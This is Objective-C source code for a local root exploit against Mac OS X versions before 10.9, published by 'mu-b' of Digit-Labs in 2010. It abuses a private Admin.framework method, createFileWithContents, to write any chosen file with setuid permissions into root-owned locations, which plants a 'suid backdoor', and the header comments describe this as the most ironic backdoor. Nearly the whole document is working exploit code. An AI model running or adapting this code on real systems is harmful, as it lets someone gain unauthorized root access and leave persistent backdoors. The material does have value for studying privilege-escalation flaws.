/* osx-irony-assist.m * * Copyright (c) 2010 by * * Apple MACOS X < 10.9/10? local root exploit * by mu-b - June 2010 * * - Tested on: Apple MACOS X <= 10.8.X * * $Id: osx-irony-assist.m 17 2015-04-10 09:54:26Z mu-b $ * * The most ironic backdoor perhaps in the history of backdoors. * Enabling 'Assistive Devices' in the 'Universal Access' preferences pane * uses this technique to drop a file ("/var/db/.AccessibilityAPIEnabled") * in a directory, * * drwxr-xr-x 62 root wheel 2108 9 Apr 16:23 db * * without being root, now how did you do that? * * Copy what you want, wherever you want it, with whatever permissions you * desire, hmmm, backdoor? * * This is now fixed, so I guess this is OK :-) * * - Private Source Code -DO NOT DISTRIBUTE - * http://www.digit-labs.org/ -- Digit-Labs 2010!@$! */ #include #include #import #import /* where you want to write it! */ #define BACKDOOR_BIN "/var/db/.AccessibilityAPIEnabled" int do_assistive_copy(const char *spath, const char *dpath) { NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init]; id authenticatorInstance, *userUtilsInstance; Class authenticatorClass, userUtilsClass; printf ("%s %s\n", spath, dpath); (void) pool; NSBundle *adminBundle = [NSBundle bundleWithPath:@"/System/Library/PrivateFrameworks/Admin.framework"]; authenticatorClass = [adminBundle classNamed:@"Authenticator"]; if (!authenticatorClass) { fprintf (stderr, "* failed locating the Authenticator Class\n"); return (EXIT_FAILURE); } printf ("* Found Authenticator Class!\n"); authenticatorInstance = [authenticatorClass performSelector:@selector(sharedAuthenticator)]; userUtilsClass = [adminBundle classNamed:@"UserUtilities"]; if (!userUtilsClass) { fprintf (stderr, "* failed locating the UserUtilities Class\n"); return (EXIT_FAILURE); } printf ("* found UserUtilities Class!\n"); userUtilsInstance = (id *) [userUtilsClass alloc]; SFAuthorization *authObj = [SFAuthorization authorization]; OSStatus isAuthed = (OSStatus) [authenticatorInstance performSelector:@selector(authenticateUsingAuthorizationSync:) withObject:authObj]; printf ("* authenticateUsingAuthorizationSync:authObj returned: %i\n", isAuthed); NSData *suidBin = [NSData dataWithContentsOfFile:[NSString stringWithCString:spath encoding:NSASCIIStringEncoding]]; if (!suidBin) { fprintf (stderr, "* could not create [NSDATA] suidBin!\n"); return (EXIT_FAILURE); } NSDictionary *createFileWithContentsDict = [NSDictionary dictionaryWithObject:(id)[NSNumber numberWithShort:2377] forKey:(id)NSFilePosixPermissions]; if (!createFileWithContentsDict) { fprintf (stderr, "* could not create [NSDictionary] createFileWithContentsDict!\n"); return (EXIT_FAILURE); } CFStringRef writePath = CFStringCreateWithCString(NULL, dpath, kCFStringEncodingMacRoman); #pragma clang diagnostic push #pragma clang diagnostic ignored "-Wobjc-method-access" [*userUtilsInstance createFileWithContents:suidBin path:writePath attributes:createFileWithContentsDict]; #pragma clang diagnostic pop printf ("* now execute suid backdoor at %s\n", dpath); /* send the "Distributed Object Message" to the defaultCenter, * is this really necessary? (not for ownage) */ [[NSDistributedNotificationCenter defaultCenter] postNotificationName:@"com.apple.accessibility.api" object:@"system.preferences" userInfo:nil deliverImmediately:YES]; return (EXIT_SUCCESS); } int main (int argc, const char * argv[]) { printf ("Apple MACOS X < 10.9/10? local root exploit\n" "by: \n" "http://www.digit-labs.org/ -- Digit-Labs 2010!@$!\n\n"); if (argc <= 1) { fprintf (stderr, "Usage: %s [destination]\n", argv[0]); exit (EXIT_SUCCESS); } return (do_assistive_copy(argv[1], argc > 2 ? argv[2] : BACKDOOR_BIN)); }